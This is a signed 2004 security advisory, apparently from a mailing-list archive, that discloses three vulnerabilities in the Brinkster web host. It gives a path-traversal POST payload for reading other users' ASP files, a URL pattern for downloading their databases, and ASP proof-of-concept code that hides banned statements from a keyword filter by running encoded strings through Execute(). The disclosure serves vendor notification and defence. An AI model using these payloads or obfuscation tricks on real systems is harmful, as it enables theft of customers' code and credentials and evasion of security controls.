-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 - ------------------------------------------------------ BRINSKTER MULTIPLE VULNERABILITIES - ------------------------------------------------------ Online URL : http://ferruh.mavituna.com/?435 1. Retrieving other users ASP Source Codes Severity: Highly Critical 2. Accessing Database Files Severity: Medium Critical 3. Skipping Brinkster Code Controls Severity: Low Critical - ------------------------------------------------------ ABOUT BRINKSTER; - ------------------------------------------------------ Brinkster is a popular free and paid Windows based web hosting company with many customers www.brinskter.com - ------------------------------------------------------ VULNURABLE; - ------------------------------------------------------ Currently (1/26/2004) Brinskter.com is vulnerable; - ------------------------------------------------------ 1.RETRIEVING OTHER USERS ASP SOURCE CODES - ------------------------------------------------------ Any valid user can access other users source codes just by know file names. So an attacker can access ASP Source Codes, database passwords and other information in source codes. This problem is related with Brinkster File Manager (http://www.brinkster.com/FileManager.asp). File Manager Edit page (http://www.brinkster.com/FileManagerEdit.asp) allows an attacker to access other user's files by modifying POST requests. ------------------------------------------------------ URL : http://www.brinkster.com/FileManagerEdit.asp POST : faction=editfile&file2edit=%5C..%5C[VICTIM USERNAME]%5C[FILE TO READ AS TEXT] ------------------------------------------------------ - ------------------------------------------------------ 2. ACCESSING DATABASE FILES - ------------------------------------------------------ If you know the name of any Brinkster user database file you can download it. (You can find database name form source code -see:first vuln.-). ------------------------------------------------------ Database URL; http://[BrinksterServer].brinkster.com/[Username]/db/[DatabaseFileName ] ------------------------------------------------------ - ------------------------------------------------------ 3. SKIPPING CODE CONTROLS - ------------------------------------------------------ Brinkster does not allow some code snippets in ASP files for server performance. Like "Server.Scripttimeout = 8000". Brinkster File Manager automatically scanning your uploaded source code and if it find any restricted keyword, it will delete your uploaded file. You can skip this by using ASP built-in Execute() function. This function is not in Brinkster keyword blacklist. So write a simple decoder and encoder for your code and use it by Execute() function. ------------------------------------------------------ Proof of Concept; ------------------------------------------------------ 1) Simple Method without Execute(); <% On _ Error Resume Next %> 2) Another Method with Execute(); <% Dim onErrorStr onErrorStr = "S e r v e r.S c r i p t T i m e o u t-E r r o r-R e s u m e-N e x t" Execute(Replace(Replace(onErrorStr," ",""),"-"," ")) %> 3) Another one with a Ascii values and Execute(); This code allows you set "Server.Scripttimeout"; <% Dim converted Const errStr = "083101114118101114046083099114105112116084105109101111117116032061032 057048048048048048048048048 " converted = Asc2Str(errStr) Execute(converted) Response.Write converted Function Asc2Str(byVal text) Dim converted, character, i For i = 0 to Round((Len(text)-1)/3,0) If Len(text) > 2 Then character = Chr(Left(text,3)) converted = converted & character text = Right(text,Len(text)-3) End If Next Asc2Str = converted End Function %> ------------------------------------------------------ // -- ------------------------------------------------------ - ------------------------------------------------------ HISTORY; - ------------------------------------------------------ 01.01.2004 - Discovered 01.18.2004 - Vendor Informed 02.08.2004 - Published - ------------------------------------------------------ Vendor Status; - ------------------------------------------------------ 2 e-mails, any answer. Ferruh Mavituna Web Application Security Specialist http://ferruh.mavituna.com -----BEGIN PGP SIGNATURE----- Version: PGP 8.0.3 iQA/AwUBQCaloDL0QoVzo2STEQLb/ACggW0TpBAbt4q+g+ejzLJ68PhGK9gAnA8L d4nBCqCN6a2YpLYyycS1klqd =jBvy -----END PGP SIGNATURE-----
This archive was generated by hypermail 2b30 : Mon Feb 09 2004 - 14:32:13 PST